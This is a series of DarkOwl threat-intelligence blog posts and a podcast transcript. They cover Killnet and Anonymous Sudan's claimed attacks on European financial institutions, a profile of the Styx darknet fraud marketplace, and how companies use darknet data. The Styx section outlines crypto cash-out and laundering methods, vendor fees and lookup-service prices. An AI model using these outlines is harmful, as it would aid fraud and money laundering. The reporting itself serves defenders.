Author: DarkOwl Content Team

Killnet and Anonymous Sudan: Identified Link

June 26, 2023

Using DarkOwl Vision, DarkOwl analysts have been monitoring activity related to the Killnet group and identified threats made in the past week relating to the European financial system. As part of this analysis, DarkOwl analysts have identified a link between Killnet and the group Anonymous Sudan.

The First Telegram Post

A post appeared on Telegram on June 15th from the Russian news site Mash which indicated that the threat actor groups REvil, Killnet and Anonymous Sudan were combining in order to mount an attack against European financial institutions. The Mash article was re-posted on both the Anonymous Sudan Telegram channel and the Killnet channel.

The original posts indicated that attacks against the Europe financial institutions would begin in 48 hours from the news article.

No clear indication has been provided of what the nature of the attacks would be but Killnet has historically been responsible for DDoS attacks (Distributed Denial of Service Attack), in which a malicious attack on a network that is executed by flooding a server with useless network traffic, which exploits the limits of TCP/IP protocols and renders the network inaccessible. Most of the posts that have been made have also been posted on the channels of both Killnet and Anonymous Sudan indicating that there is some collaboration behind the admins of these channels.

A new telegram channel was set up purporting to be from the group REvil. This channel welcomed Killnet and also posted a poll for followers of the channel to vote on which financial system in Europe they would like to be targeted. Other than an image of cryptocurrency nothing else has been posted on this channel to date.

Who is REvil?

REvil is a group that conducted ransomware attacks and was assessed to be based in Russia. The group was successful in targeting a number of corporate organizations including Apple, JBS and Colonial Pipeline. In 2021 the group appeared to be disbanded by joint law enforcement actions and their infrastructure was dismantled. It is unclear if the actors reported to be part of this action were previous members of the REvil group or if they are using their name due to their notoriety.

While there has been some reposting of REvil posts on the Killnet and Anonymous Sudan channels the REvil channel has not reposted anything from the other groups. Furthermore, in later posts by Killnet and Anonymous Sudan REvil is not mentioned which may indicate they are less involved in the activity.

Anonymous Sudan and Killnet Acting Together

On June 16th, both Anonymous Sudan and Killnet posted a message suggesting that there were issues with the IBAN banking system. No reporting was identified that indicated that this was the case. The below screenshot is from DarkOwl Vision.

On June 19th, Anonymous Sudan made a post which was provided in both Arabic and English that indicated an attack was imminent and that the timeframe that was reported was made by the media and that they indicated that their attacks would happen in a timeframe not that the results would be evident.

On June 19th, Killnet claimed that they had attacked the European Investment Bank. They provided a post indicating that the attack against the European banking system had begun and provided a screenshot from Wikipedia providing details of the European Investment bank. The message was signed by both Killnet and Anonymous Sudan.

The channel then provided posts which appeared to show that there was an error on a European Investment Bank page.

They then reposted another article from the Mash Telegram channel which indicated the European Investment bank was being targeted by Russian cyber criminals. This included images from the Telegraph, a UK newspaper, and a tweet by the European Investment Bank indicating that they were a victim of a cyberattack. Open-source reporting indicates that the cyberattack was affecting the availability of some of the bank’s websites.

The attack on the European Investment Bank appears to have only effected their websites and is likely a DDoS attack. This is activity both Killnet and Anonymous Sudan have conducted in the past and it is unclear if they have other capabilities that they will utilize. It is possible that the groups were utilizing the name of REvil to suggest they had further capabilities given the groups previous reputation, but there is no data to support this at this time.

Posted on June 21, Killnet made a claim that the International Finance Corporation (IFC) had been taken down.

[TRANSLATED IMAGE]
Goodbye 🤚
Unfortunately, the IFC is no longer working, we ask all partners and staff of the Bank’s organization to go #uy 🖕
The International Finance Corporation (IFC; English International Finance Corporation, English IFC) is an international financial institution that is part of the World Bank. The headquarters of the organization is located in Washington (USA, 2121 Pennsylvania Ave NW, DC 20433).

No evidence was provided to confirm this attack and no reporting has been identified to indicate that the IFC has been successfully targeted.

Other posts on the Telegram channels are targeting other organizations, reposts from other sources or requests for donations to be made.

Conclusion

While these groups have claimed that they will bring down the European financial system there is little evidence to suggest that they are following through with the threat, furthermore the capabilities that these groups have historically utilized suggest that any attacks which take place are likely to be a DDoS attack. DarkOwl will continue to monitor for any further activity.


Don’t miss an update. Subscribe to our weekly newsletter.

Darknet Marketplace Snapshot Series: Styx Market

June 21, 2023

In DarkOwl’s Darknet Marketplace Snapshot blog series, our researchers provide short-form insight into a variety of darknet marketplaces: looking for trends, exploring new marketplaces, examining admin and vendor activities, and offering a host of insights into this transient and often criminal corner of the internet. This edition features Styx market.

Don’t forget to subscribe to our blog at the bottom of this page to be notified as new blogs are published.


What is Styx Market?

Styx is a darknet marketplace selling illegal techniques for committing fraud, money laundering, and access to stolen data. Chatter on the darknet around Styx market first appeared in 2020 before the marketplace officially opened in mid-January 2023.

Figure 1: Captcha to Styx Market; Source: Styx Market

Styx market offers stolen data as well as a variety of products for conducting illegal cyber activities. Examples include 2FA/SMS bypass, Business Full Info/Tax, Installs for stealer, Anti-detect browsers, laundry services, FB/Google logs, Cashout Banks/VCC, Credit Cards (CC), Crypto-mixer, Stealer services, Look up BG/SSN/DOB, RDP (remote desktop protocol)/ VDS (virtual detected server) /VPS (virtual private server), and many more. Table of definitions can be found at the bottom of this blog, here.

Figure 2: Homepage of Styx Market; Source: Styx Market

Infrastructure of Styx Marketplace

Styx marketplace is divided into five main sections: the main page, trusted sellers, auto ESCROW, news, and a filters section to search for specific products on the left side.  

The main page of the marketplace has posts by users advertising what they sell on the market. The users have usernames that are not assigned and can be personalized. The majority of the site is in English and therefore easy to navigate for English-speakers. However, many listings and names of vendors are in Russian. This includes vendors on the Trusted Sellers page. Vendors on a trusted sellers page have typically been vetted by the administration running the site, and therefore are more “trustworthy”.  

DarkOwl analysts assess many sophisticated darknet actors are Russia-based. Therefore, the fact that some vendors and their listings are Russia-affiliated adds to the legitimacy of the marketplace. There are noticeable spelling errors throughout the site in some of the listings posted by vendors. In some cases, a listing will include both a Russian and English translation. Some of the filters that can be used to search for specific products or goods offer a Russian translation right next to them.  

Many kinds of stolen or leaked data for sale are offered in listings. Listings can be found on the main page, under News, and certain kinds of data can be searched for with the filter bar. Looking at individual listings, the personal data available sold is noticeably mostly from the West. The kinds of data for sale are typically PII (personal identifiable information) and credentials – information that can be used for fraud and scams. For example, a hacked database of U.S. payday loans is available for $90. There are also national Spanish identification cards available. Many foreign governments issue national identification cards to their citizens which are used while voting, traveling, applying for government benefits, and are used by law enforcement for identification purposes. Other personally identifiable information from the EU such as credentials are offered in multiple listings. However, multiple APAC (Asia Pacific) countries and Middle Eastern countries are also present on the site.

For payment, Styx market has its own ESCROW-enabled payment system. According to the terms and conditions of the marketplace’s auto-ESCROW, the maximum amount a transaction can be is $1,000,000 USD. The ESCROW system can also be used by buyers and sellers for dispute resolution. They can invite an Arbitrator by clicking on a support button. The Arbitrator takes 4% of each arbitration, and their decision is final.  

The infrastructure of Styx Market relies heavily on a Telegram component. 

In some cases, the “contact seller” button on the marketplace will lead directly to a Telegram channel. Vendors who rely on Telegram will typically have multiple channels tied to their vendor shop– one for administrative support and another for selling their products.  

Figure 3: Trusted Sellers of Styx Market; Source: Styx Market

Focus on Financial Crime

The majority of services on the marketplace appear to be financial. Customer information for digital banking services such as Chime and PayPal are listed as well as more traditional banks including Capital One Bank, Wells Fargo, Citi Bank, and Old National Bank, among others. Access to cryptocurrency exchanges and Bitcoin platforms are prevalent across the site; sites such as Crypto[.]com, Coinbase, BitRue, Kraken, and others are listed by sellers to offer access to compromised accounts or to facilitate cashing out illicit funds. It’s unclear from research which these accounts are offered for, but historically we have seen them used for both.

Figure 4: Wells Fargo Account; Source: Styx Market
Figure 5: KYC Binance Tutorial; Source: Styx Market

The products and data available on Styx can be used to help a cybercriminal at every stage in the process of financial fraud. This could start with social engineering emails targeting CEOs, using lookup services to find and collect data on targeted individuals as reconnaissance such as a mother‘s maiden name or the name of a family pet and past addresses to help access accounts, and creating accounts to drop and launder money. Lookup services are used by cybercriminals and bad actors for reconnaissance. They use lookup service information to help them pass verification and authenticate their victim’s identity when they are committing fraud.

Figure 6: Telegram Channel for a Lookup Service on Styx Market; Source: Telegram

[TRANSLATED IMAGE]
☀️Search manually: 
DL ($8) 
SSN ($8) 
DOB ($2) 
EIN ($10) 
☀️Search via API: 
DL ($8) 
SSN ($8) 
⚙️Connect to the API and search 24/7 

Styx market also provides cash out and money laundering services. Multiple vendors claim to provide this service, and each has their own requirements. For example, the vendor “Verta” typically charges a 50% commission. They also have requirements for the minimum amount of money needed for a transfer: $15,000 minimum per transfer to a personal account and $75,000 minimum per transfer to a business account. 

Figure 7: Verta Requirements; Source: Telegram

Facilitating financial crime appears to be a major component of the services offered on Styx marketplace. Cash out vendors require significant minimums of money for their services. Cash out services are used to turn illicit Bitcoin into fiat currency. This can be an issue if the service, such as Coinbase, requires users to use their real identity and to prove that the crypto funds are legal —neither of which a darknet actor would do.

Banks are wary of cryptocurrencies’ links to the darknet and will likely be hesitant to cash out large sums of crypto, or will raise a red flag and require additional documentation. Darknet cash out services help darknet actors cash out their illegal cryptocurrency by using their own methods to circumvent the system. Exact methods are hard to come by as vendors don’t publish what they are profiting from. However, one way includes using multiple Bitcoin wallets, running them through personalized mixers, and finding a Bitcoin buyer who gives cash in exchange. Another way is to send Bitcoin to a company that will charge a prepaid debit card.

Cash out services typically have minimums and high commissions, indicating that their customer base are actors with illicit cryptocurrency gains who have enough funds that the cash out will be helpful to them despite the high commission. These signals could indicate that Styx market has been designed and built for users who are already experienced in cybercrime, since they appear to have access to a high amount of illicit funds.

Unique Characteristics of Styx Market

DarkOwl analysts have observed a unique characteristic of Styx market is its interconnectedness with Telegram. For each listing, the user has the option to get in contact with the seller directly to purchase the item. A “Get in Contact” button will either bring the user to a page with a chat box on the marketplace itself, or the user will be taken to a Telegram channel. The Telegram channels are a mix of bots or direct access to the sellers themselves. Some Telegram channels, such as the money laundering service “Verta”, are used by the sellers to make public their terms of service and to publish positive reviews of their services. Positive customer reviews are key to gaining trust in the darknet community.  

Limited descriptions of products are given on the site and users are often re-directed to a specific Telegram channel of that vendor. The Telegram channels are either a channel for direct messages to the seller or are the seller’s support Telegram channel.   

A Telegram channel is used to broadcast information to a wide audience; only admins are able to post and there can be an unlimited number of subscribers. A public group is similar to a channel, but all subscribers can post in the chat. Public channels have a username, and anyone can join. Private channels are only accessible if a user is added by the owner or receives a private link to join. Analysts have observed that it is common for darknet vendors to have multiple Telegram accounts, where each is used for a different purpose. One may be just for support, one could be for posting new products, and yet another might be for direct messages to the admin.

Figure 8: Link to Deviant Shop’s Telegram from Styx Market; Source: Styx Market

In the Telegram channels, descriptions of products and availability are shared. Buyers can also get pictures of the kind of products they are looking to buy as proof.

Figure 9: Deviant Shop Telegram Channel; Source: Telegram

A Look at the Vendors of Styx Market

To understand if a darknet marketplace is sophisticated, it is important to assess the legitimacy and level of sophistication of its vendors. Trustworthy darknet marketplaces are more likely to have vendors with a considerable darknet footprint. More legitimacy is afforded to a vendor if they have been selling for multiple years, across different marketplaces, and have been evaluated to be trustworthy and not a scammer. Using DarkOwl Vision, the darknet, and darknet-adjacent sites DarkOwl analysts looked at vendors from Styx market to review the vendor’s footprints across the darknet. The presence on the darknet of the vendors will likely indicate if vendors on Styx market are sophisticated hackers or skids. 

The vendor shop “Valera888” sells PII, such as national identification documents, on Styx market. Using DarkOwl Vision, this same vendor’s username was found on darknet carding sites, a popular darknet Russian hacking forum, and more darknet marketplaces dating back to 2019. Although the same username on Styx has been used across darknet marketplaces in the past there is no way to tell if the same person is behind those accounts. In the past they have been associated with selling CVVs and private software. The username could be connected to the same user since they seem to follow a pattern selling personal information, but this is unconfirmed.  

Figure 10: Mapping Valera 888 with information from DarkOwl Vision

“337 Diller” is a vendor on the trusted vendors page of Styx marketplace. This vendor offers lookup services.

Figure 11: Vendor Profile of 337 Diller on Styx Market; Source: Styx Market

There are two Telegram channels immediately associated with this vendor on Styx marketplace. Further research reveals other channels run by a vendor with the same name selling similar products on Telegram. One of the Styx-market associated channels advertises data for sale and recruitment posts. Purchases of the data posted on this site can be made through their linked Telegram bot channel. A support channel is also linked within this channel. The other channel consists of reviews of the vendor. 

Figure 12: 337 Diller selling services on Telegram; Source: DarkOwl Vision

Research from DarkOwl Vision indicates this vendor has been offering lookup services and fullz since at least 2021 both via Telegram and on popular darknet marketplaces and forums.  

Figure 13: Mapping 337 Diller using data from DarkOwl Vision

“Podorozhnik” sells drawing services as a vendor on Styx market where a user can get in touch with them via the chat feature offered on the site. In addition to their presence on Styx, they also offer their fake documents for sale via dedicated Telegram channels. Drawing services is a term used for forged documents and fake documents. “Podorozhnik” advertised their drawing services on the darknet site DarkMoney in 2021. No Telegram channels are linked directly on Styx market, but there are multiple public channels connected to ”Podorozhnik” on Telegram. For example, they have a Telegram channel dedicated to reviews. These show communication between customers and “Podorozhnik” of successful verifications. A Telegram channel advertising “Podorozhnik” claims they had over 900 positive reviews on a popular Russian Forum.

Figure 14: Mapping Prodorozhnik using data from DarkOwl Vision

As each of the three vendors researched appear to have been present on darknet forums and marketplaces for years before joining Styx, they are more likely to be sophisticated and legitimate vendors. Vendor reviews are an essential component to establishing trust on darknet marketplaces and reassuring potential buyers of the legitimacy of the vendor. Two of the three vendors have reviews readily available for potential buyers to evaluate. These include Telegram channels dedicated to reviews. These reviews point to trust in the vendor. They have also embraced using Telegram for selling products and services and as a support system for customers. Telegram continues to grow as a main avenue for buying and selling darknet-related goods. Some of the Telegram channels associated with Styx marketplace vendors were created as early as 2021, while others have been created within the last year.

Final Thoughts

The products sold on Styx marketplace are hacker and financial-crime oriented. The market caters to sophisticated cybercriminals. Vendors offer access to multiple online banking and e-commerce sites. Money laundering services are strict and only for those who can pay meet the dollar minimum. While money laundering is risky, therefore requiring a minimum for payments, vendors have been successful enough to continue offering the service. And despite the high price there appear to be customers who are willing to pay. Financial institutions and the banking sector will need to continue to be wary given the account identity authentication techniques available for sale on Styx market. These include NFC Bins (NFC is what allows for contactless payment on cards) and vendors offering to set up funnel accounts which can be used as a drop service to “drop” stolen financials. Much like cash out vendors, drop services are used for money laundering illegally earned funds. For now, Styx market will provide a valuable outlet for cybercrime on the darknet as cybercriminals go after the online components of banking and come up with new methods for money laundering.  


Subscribe to email to receive the latest research directly into your inbox every Thursday and don’t miss our next Darknet Marketplace Snapshot.

Table of Definitions

WordDefinition
2FA/SMS Bypass2FA is two-factor authentication and is used to help secure accounts. SMS text messages are a common way to use 2FA many times by using one-time codes. Cybercriminals can achieve SMS bypass by SIM swapping or intercepting networks.
Business Full Info/TaxBusiness full into consists of detailed PII that could be utilized by a cybercriminals to commit fraud or identity theft. Coupled with tax information, the bad actor would possibly be able to commit many forms of financial fraud such as fraudulent wire transfers.
Installs for stealersSome stealers are sold as pay-per-install services. A user can pay to download the malware and install it on compromised systems of their choice
Anti-detect browsersAnti-detect browsers can be used for privacy and anonymity online as they avoid detection from online web-tracking technologies.
Laundry ServicesLaundry services are money laundering services to “clean” cash received from illegal activities and get the cash into the legal banking system.
FB/Google LogsLogs are records of activity that take place on computer systems. Using a record of activity such as Facebook posts and Google searches, a bad actor could use this information for phishing texts, emails, and sophisticated social engineering campaigns.
Cashout Banks/ VCCVCC stands for virtual credit cards. Cashing out bank accounts and cashing out virtual credit cards can be used to steal funds or for money laundering.
Crypto-mixerCrypto-mixers are used for obfuscation. They mix the cryptocurrencies of many users together to obfuscate where money comes from and who it belongs to. The money is later withdrawn to new addresses belonging to each user.
Stealer ServicesStealer services are the stealer-as-a-service market. Actors offer their stealer malware for sale for a customer to essentially rent to then compromise and access a device on their own. This way a customer with very little technical know-how can have access to sophisticated stealer malware. These are aimed at less-sophisticated users.
BG/SSN/DOBBackground check, Social Security number, and Date of Birth. This information can be used for identity theft, fraud, and social engineering. 
RDPRDP, remote desktop protocol, is a Windows interface that allows users to connect with another computer or server over the internet. Bad actors will sometimes use open RDP ports to install their ransomware onto the victim’s system.
VDSVDS stands for Virtual Dedicated Server and is essentially leasing a dedicated server that the user controls completely because it is not shared with other customers. A VDS is the conglomerate of a server, its hardware, and the operating system run by a remote access component allowing the user to access their server over the internet.
VPSVPS is a Virtual Private Server, and they are used for web hosting. Nation-state actors are known to use these in attacks as a proxy or bridge between the real server and the target as well as other methods like hosting RDPs, VPN, and proxy gateways to hide the location of the command and control servers. They are used to hide locations so as hide from security systems on targeted devices and to obfuscate the true IP addresses and locations.

DarkOwl Strengthens European Presence at ISS World Europe

June 16, 2023

Last week, DarkOwl participated in ISS World Europe in Prague. ISS World Europe prides themselves on being “the world’s largest gathering of Regional Law Enforcement, Intelligence and Homeland Security Analysts, Telecoms as well as Financial Crime Investigators responsible for Cyber Crime Investigation, Electronic Surveillance and Intelligence Gathering.” ISS World events (DarkOwl will be at a couple more this year) focus on the latest in cyber tools and methodologies specifically for law enforcement, public safety, government and private sector intelligence communities. The first full day of ISS events is dedicated to training and in-depth sessions. Trainings and topics covered throughout the event include how to use cyber to combat drug trafficking, cyber money laundering, human trafficking, terrorism and other nefarious activity that occurs all across the internet.

Representing DarkOwl this year at ISS World Europe was one of DarkOwl’s dynamic duos, David Alley, CEO of DarkOwl FZE based in Dubai and, Ramesh Elaiyavalli, CTO of DarkOwl, based out of DarkOwl’s headquarters in Denver, CO.

The networking opportunities this year were unmatched. David expressed, “This was the best ISS Prague I have ever attended. The show continues to grow in importance.” Needless to say, the team looks forward to next year. In addition to networking with new prospects, David and Ramesh were able to meet with a number of current partners and customers, an opportunity which is invaluable to have roadmap conversations, gather feedback and catch up face-to-face. Throughout the event, top minds of the space share the latest technology, trends and thought leadership in the cyber community. Topics this year included the growth of Telegram, cryptocurrency de-anonymization, blockchains’ growing role in geopolitical conflict, policing Tor, info-stealer ecosystems, visual intelligence from IoT, AI, mobile tracking, and more.

Ramesh noted a common theme throughout attendees, conversations and presentations, “everyone is suffering from data fatigue – too much data and too little insights.” This emphasizes the importance of law enforcement’s need to invest in software and data solutions that deliver insights and makes data easily digestible. DarkOwl plays an important role in providing valuable data and threat intelligence to this market.

Due to the layer of anonymity it provides, the darknet is often a hub for illegal activity. However, investigating crime on the darknet and deep web poses technical challenges, including the fact that darknet sites are continually coming on and offline with pages vanishing from one minute to the next. The technology DarkOwl leverages to scrape and index hidden digital undergrounds are key to the mission of obtaining proactive situational awareness for protection of the nation’s security initiatives. DarkOwl Vision UI provides a user-friendly interface with powerful querying capabilities to search, monitor, and create alerts for critical information. DarkOwl Vision has been used to support local and federal police investigations, as well as work done in intelligence/fusion centers and federal agencies to uncover human trafficking, opioid selling, terrorism, security issues, and other illegal activity, making it the perfect tool for this audience to be able to dive into.

Live Demonstration of DarkOwl Vision: Darknet Intelligence Discovery and Collection

The first day of the event, before booths were open, David Alley was able to give a live presentation to attendees demonstrating DarkOwl Vision: Darknet Intelligence Discovery and Collection. The team is thrilled to share that the conference room was filled to the brim with standing room only. The goal of this session was to further educate the international intelligence community on how threat actors on the darknet are evolving in their use of new tools and methodologies.

Vision UI is the industry leading platform for analysts to simply, safely, and comprehensively search the largest commercially available source of darknet data. Vision provides a user friendly interface with powerful querying capabilities to search, monitor, and create alerts for critical information. You can read more about Vision UI here.


DarkOwl looks forward to continuing our global presence at ISS events, you can see where we will be next and request time to meet with us here.

Forecasting Cyber Threats

June 13, 2023

The darknet contains data critical to understanding criminal behavior and security risk, and companies need an understanding of their exposure on the darknet to determine risk and take mitigating actions. 

This report outlines DarkOwl’s new metric based on email and credential volume to measure an organization’s exposure. We tested our metric against 237 public cyberattacks occurring in 2021 and 2022 and found our signal was elevated within the last four months prior to an attack for 74% of the organizations. 


To learn more how DarkSonar can inform threat modeling, third party risk management, cyber insurance, and potentially predict cyber threats, contact us.

Data and the Dark Web: What is it, where is it, and why should we care?

June 07, 2023

Alison Connolly Halland, DarkOwl’s CBO, and Andrew Bayers, Head of Threat Intel at Resilience, discuss the ways data is collected on the darknet and the tools protecting business information, on Building Cyber Resilience Podcast brought to you by Resilience.

What you’ll learn:

  • The ways tools like DarkOwl use threat intelligence to improve resilience.
  • The importance of having layers in your security strategy.
  • Action steps for using darknet information for good.

For those that would rather read the conversation, we have transcribed it below.

NOTE: Some content has been edited for length and clarity.


Alison: We searched for the organization’s email addresses that had been exposed. Those came up. There were plain text passwords associated with them for someone that was actually on the, on the call, which happens all the time. But the part that was embarrassing is their plane text password was not something you would want. My guess was they made it as a 17 year old teenage boy and hadn’t changed it yet.


Ann: Welcome to the Building Cyber Resilience Podcast by resilience. I’m Dr. Ann Irvine Chief Data Scientist and Vice President of Product Management.

Richard: And I’m Richard Seiersen, Chief Risk Officer.

Ann: That was DarkOwl’s Chief Business Officer, Allison Connolly Halland, at the top of the show sharing why it may be time to update your password if you haven’t changed it since high school. It’s because of her company’s innovations that her joke is just that and not a breach that destroyed a business.

Alison: We are essentially darknet experts. So what we do 24/7 is we pull content off of the darknet, we park it in our own database, and then we provide our clients who are companies, not individuals, access to that data. Where our expertise lies is in the act of the collection – collecting data off of the darknet is not an easy task. And then number two, in filtering it, sorting it, layering on all of the bells and whistles on top of it so that you could go into our database and type in your social security number, up is gonna hopefully pop nothing, but if it does, it would show you those pages on the darknet that we, DarkOwl, have discovered that has that number present.

Ann: Alison originally started out in finance but was intrigued by some of her consulting clients in the security space. She eventually took the leap and joined the DarkOwl team in Denver, Colorado.

Alison: I’ve been here 6 years and we’ve been through a bunch of iterations and it’s been a really fun company to grow with. There’s just so much happening in the cybersecurity landscape that it’s great. I love it.

Richard: Allison’s work on the front lines helping security professionals use data from the darknet to inform their day-to-day operations is a very specific niche asset to the cybersecurity industry. But it’s important to define exactly why your work is so critical.

Andrew: Why would the CISO at a company care about what happens on the dark web? They have a website on the surface web, they don’t operate on the dark web. But seeing what’s happening today and where the conversations are going, that can help in the prioritization of how you address vulnerabilities. So threat intelligence, I like to say, puts a lot of the why behind a lot of the security controls we and our partners recommend to companies.

Richard: That’s Andrew Beires, Head of Threat Intel at Resilience, before this role, however, he wore several hats.

Andrew: I started in film school in New York City working at HBO on Sopranos and Sex and the City. And 9-11 happened and I rushed to a Marine Corps recruiting station and shipped off to Paris Island where I went through bootcamp and the Marine Corps sent me to the Defense Language Institute where I learned Korean and Chinese Mandarin. And then I worked on behalf of the Department of Defense and Marine Corps at the National Security Agency for the majority of my adult life. And that’s how I got into the cybersecurity space. So most of my work prior to rejoining resilience was as a nation sponsored, advanced persistent threat actor collecting foreign intelligence against our nation’s and allied nations foreign adversaries. So yeah, that’s me.

Richard: Andrew is in the trenches at Resilience, using threat intelligence tools like DarkOwl to not only protect our company but also to achieve our mission – to help our clients stay ahead of the bad guys.

Andrew: You know an organization that wants to protect their posture and their critical business functions, looking at the darkweb for those types of threats is critical.

Ann: In this episode with Allison and Andrew, we explore both sides of the security workflow from learning how the data is collected and organized to why it is necessary for making business decisions both proactively and reactively. What is the dark net and why should we care about it? Why are layers so important to build into your cybersecurity strategy? Do you have to work in a basement and wear a black hoodie in order to access this information?

Richard: Alison and Andrew answer these questions and offer valuable action steps for how this underworld of information can be used for good and know, in case you are wondering, a basement office and black hoodie are not required unless that’s your style, of course, which is totally cool. Anyways, let’s get into it.

Alison: In some ways, people are overly confident on the darknet because they believe that given the lack of IP addresses and cookies and what not, remaining anonymous is kind of it’s defining feature so there is kinda some false sense of security there, that even if people are looking at that content, they can’t trace it back. The other thing I think is really funny, or I don’t know why it is funny because I was an econ major and I should know that all these market rules apply wether it is legal or illegal, is that the quest to be the best in the customer success department in the darknet is very much present. So there’s a lot of credit card forums, my favorite one says “we are here to serve our customers, we are the best! We ship overnight, free shipping, we are extremely reliable…” you know reading the verbiage just makes you laugh, because you think these are criminals, but like any business they are trying to win and maintain customers.

Ann: Same with ransomware gangs, right? They have entire customer success divisions.

Alison: Yup!

Andrew: Bad guys are in the business of business too, right?

Alison: Exactly.

Ann: Mm-hmm.

Richard: The darknet is an encrypted layer of the internet that cannot be found through regular search engines like Google. It is used mostly for illegal activities and is a breeding ground for data leaks. Laughs aside, the darknet is not a space you want to enter without proper preparation tools and support.

Alison: You know, you run the risk of potentially running into content you don’t want to see, visually, you also run the risk of ending up in maybe a marketplace or a forum and potentially exposing your own identity without knowing it. And I think the other one, the third one, which is the reason we, DarkOwl, is in business is it’s an extremely, extremely inefficient place to navigate. So if you think about the surface web, you go onto Google type in your search term, and there are all the results and we all trust that Google has gotten that right. That’s why they are who they are. The darknet is not structured in that way. So if you were to go onto Tor, which you can, that is not an illegal act in itself. It’s just very hard to navigate. There’s not nice clean URLs to find, there’s no pretty search engines or search bars, so you’re gonna burn a lot of time frankly.

Ann: While the anonymous factor that Alison highlighted earlier is certainly part of the draw to the darknet, it’s not entirely true. Leaders like DarkOwl are making the data more searchable to help companies identify specific actors on the darknet through graphing.

Alison: So I mean, part of it is us, as we collect all of this data and we’re indiscriminate in how we do that. And what I mean by that is we don’t look at, look at a page on the darknet and say, oh, this is outside of our industry – we’re not gonna grab it. We always grab it. And then once we do, the first thing we do is just tokenize everything that we see. Do we see social security number? Do we see an email address? Do we see a domain? Do we see an IP address? And obviously there’s tons of free text in between there, but we’re gonna tokenize as many items as we can, right? Is there an ampersand, like a threat actor name? And then once you’ve done that, like you said, it becomes really interesting when you can graphically represent the information, right? If you are a seller on a marketplace and we can connect you to a different seller that has a similar name that was, you start to play that game, which becomes really powerful in the investigation space. We are extremely strong on the identification of entities within the data. The graphing piece we are adamantly working on and have made some huge strides, but we haven’t, we definitely, if I’m being honest, we haven’t perfected that piece yet. And some of our clients actually use their own graphing abilities on top of our data.

Richard: So very interesting business model. And I’m just curious, maybe you can tell me about the type of clients you have and the threat intelligence groups and folks like that, that are in these organizations. I just have to assume their use cases are varied, but I’d like to hear more about that.

Alison: I like to bucket our clients into three groups. There’s one that people don’t often think of, that is where the majority of our clients sit. So number one, we do serve government and law enforcement. If you work for the DEA and you are in charge of tracking down folks selling fentanyl, you would wanna have access to the darknet where they’re actually doing that. And the DEA is not a client for the record, but that is one bucket of our clients – although the smallest.

Number 2 is large enough corporations where the risk of having their own organization exposed on the darknet is worth looking at this data set. So think Fortune 1000, you’re the CISO of Nike, and you wanna know, is someone targeting my executives? Is someone going after my IP address? Is someone talking about a ransomware attack or are my newest designs of my Nike shoes being sold. Counterfeiting is a big use case for us. So clients that have products that are being sold in counterfeit markets. So those are companies that are purchasing DarkOwl data and they’re looking at it for their own edification. That’s bucket number two.

And then interestingly, the biggest bucket of our clients are clients that are purchasing DarkOwl data, aggregating it and looking at it on behalf of their clients. So most of those folks sit in the cybersecurity industry. So it’s other cybersecurity companies that are, and we are essentially that darknet component. So I sort of like to think of it – you buy a Dell computer and it, you know, they used on the ad, they’d be like, powered by Intel and then it would make that little noise. So, it’s DarkOwl or their darknet is powered by DarkOwl. So, and that runs the gamut. They could be layering it on top of social media data. They could be just doing penetration testing and they’re using our data. They could be like you all in the cyber insurance space and they’re looking at DarkOwl across tons of potential companies. So that’s where the majority of our data and our clients reside is those that are looking at added on behalf of their clients.

Ann: At Resilience, this is how we utilize DarkOwl. Andrew Beires, Head of Threat Intel, is quick to point out that what he is looking for in his role falls right in between the bad activity happening on the darknet. And the good activity.

Andrew: You hear about the dark web and the news and really all the conversations you hear about it are about most of the bad things that are happening, right? So, you know, the illicit financing, the money laundering, the drug, narcotics sales, the gang activity, the criminal underbelly, sort of like place of communication. But there are actually a lot of good things going on where people in more oppressed nations who have, you know, a difficult time getting information out of their countries and sharing that with the world, that’s a great place to do that. There are journalists there, whistleblowers, there are people doing good on the dark web. So there’s good stuff too, if that’s what you meant by good. Now there’s a lot of juicy stuff that we care about, but none of it is good. None of that is good, right?

Richard: So the juicy stuff goes under the general rubric of threat intelligence. I always like asking people what is threat intelligence and how would I know it’s happening to me?

I always like asking people that question because the answer points to why we do what we do at resilience, Andrew highlights exactly how this plays out in his day-to-day workflow.

Andrew: You know, it’s like know your enemy, right? So knowing the people behind the keyboards that are attacking you, or have the potential to attack you, what their behaviors are. Like, what are the types of malware that people are purchasing? What are the trending vulnerabilities that are being discussed? So we had pretty strict criteria about the things that we want to engage directly with our customers about, and it has to meet three pieces of criteria. One, the vulnerability, so we are consistently evaluating the posture of our book of business. And so, and that’s company by company. And with the help of a lot of great people in engineering and data science, we are able to do this on a regular basis that a lot of it is automated. And so for us, when we see a company that, let’s say we, we see a vulnerability that is associated with some asset that they have exposed to the internet.

So first, is it remotely accessible. Like is it exposed to the internet or is this some local vulnerability that there would be a sort of a higher bar of entry in order to get to that asset. So those aren’t those types of things we wouldn’t really see from what we do. So it has to be remotely accessible. So remotely exploitable, right? It has to be our customers. So, you know, not a CVSS score, right, of critical. It doesn’t necessarily have to be a critical vulnerability, but if it becomes a critical vulnerability to us, if we know attackers are exploiting it actively in the wild or a proof of concept has been released on how to exploit that vulnerability. The third piece is there is actionable mitigation or remediation measures that have either been released by the vendor or a security researcher or somebody. So there is a specific action that the customer can take to mitigate or remediate. And then when we identify those, so it meets those criteria, we engage directly with the customer to notify them and help them through the process of remediation.

Richard: One follow on to that. So one vector of course is the remote. But many bad guys these days, particularly ransomware, they’re attacking what we call layer A, the human right? So be it spear phishing or phishing in general, or you think about business email compromise, all these other vectors. What’s the bridge between that threat intelligence and how you work with your customers?

Andrew: Sure, the dark web is a great place to hunt for potential insider threats. And that doesn’t necessarily mean it has to be a malicious insider. Maybe it’s a negligent or unintentional error on the part of an insider that led to something like their credentials being exposed. Maybe it’s something through their own personal life that was exposed and then somehow that is, you know, associated to it enabling some sort of access to that organization. So another piece on the malicious sort of insider that the dark web is the place where people sell access to threat actors. So it is also the place where threat actors advertise paying for access to specific things like, “hey, do you work for this type of company? If so, and you have access, we would like to buy that from you.”

Ann: Wow, that’s terrifying to think about people sort of selling their access as an employee of an organization. A comparable thing happens, of course, and working with any nation state for espionage. But how often is that really happening? Is that happening frequently?

Andrew: Every day. And it’s on the rise, I would say like more in 2022 than in 2021. And I mean, the expectation is more in 2023. So our CISO loves to make this joking comment and I find it funny, but it is scary. Like you said, it’s terrifying, right? We’re all just one bad day away from being that threat actor selling access.

Ann: Yeah. In a way, I kind of hate talking about this in a public venue like this podcast, you know, I don’t wanna advertise that this is a thing… hey, go to the dark web and you can make a quick buck with your corporate credentials. But sounds like that could be the case.

